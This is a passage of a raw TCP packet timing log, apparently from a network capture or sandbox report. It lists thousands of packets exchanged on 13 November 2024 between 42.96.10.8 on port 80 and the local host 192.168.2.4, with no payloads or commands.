                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198623896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198653936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198669910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198684931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198699951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198689938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198689938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198689938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198717117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198734045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198749065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198765993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198769093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198769093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198769093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198782921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198808908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198824883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198849916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198853016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198867083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198920012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198925972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198935986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198955059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198971033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198971033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198980093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.198998928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199012041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199028969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199044943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199059963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199080944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199095011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199110985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199115038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199115038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199115038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199115038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199126005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199136972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199142933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199157953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.199352026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206773996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206788063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206804037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206829071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206844091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206860065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206888914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206888914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206947088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206964016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.206990004 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207005024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207010984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207010984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207020998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207043886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207061052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207071066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207072973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207120895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207158089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207173109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207276106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207289934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207304955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207329035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207344055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207369089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207369089 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207389116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207405090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207429886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207457066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207472086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207473040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207516909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207530022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207542896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207559109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207561016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207571030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207576036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207592964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207639933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207650900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207650900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207665920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207680941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207695961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207710028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207717896 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207726002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207748890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207794905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207796097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207902908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207918882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207932949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207958937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207972050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207976103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.207993031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208009958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208009005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208029032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208044052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208059072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208072901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208072901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208072901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208100080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208123922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208139896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208153963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208168983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208180904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208198071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208198071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208198071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208208084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208225965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208240032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208254099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208280087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208280087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208280087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208281040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208298922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208312988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208338976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208353043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208369970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208374977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208374977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208384037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208412886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208412886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208441973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208456039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208470106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208486080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208499908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208517075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208533049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208543062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208543062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208543062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208573103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208585978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208600044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208616018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208617926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208631039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208637953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208667994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208673954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208688021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208703995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208719015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208756924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208756924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208760977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208776951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208791971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208806992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208828926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208828926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208872080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208918095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208923101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208940029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208956957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.208971977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209008932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209009886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209026098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209050894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209101915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209116936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209132910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209145069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209161043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209184885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209199905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209213972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209230900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209235907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209235907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209248066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209270000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209290028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209306002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209321976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209330082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209331036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209436893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209481955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209496021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209511995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209563971 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209589005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209604979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209620953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209635019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209640980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209651947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209691048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.209992886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248080969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248152018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248167038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248183012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248199940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248217106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248234034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248250008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248276949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248290062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248290062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248291016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248291969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248311043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248337984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248342037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248356104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248383999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248436928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248455048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248455048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248472929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248487949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248505116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248543024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248548031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248548031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248558998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248577118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.248598099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.249458075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.279944897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.279973030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280003071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280075073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280090094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280106068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280121088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280136108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280170918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280170918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280170918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.280170918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288343906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288357973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288374901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288443089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288459063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288487911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288489103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288489103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288505077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288522005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288537979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288558006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.288558006 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289530993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289741993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289758921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289777040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289800882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289817095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289846897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289849997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289849997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289865017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289880991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289896011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.289932013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.291363955 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.309139013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.309163094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.309180975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.309369087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.309369087 CET4973380192.168.2.442.96.10.8
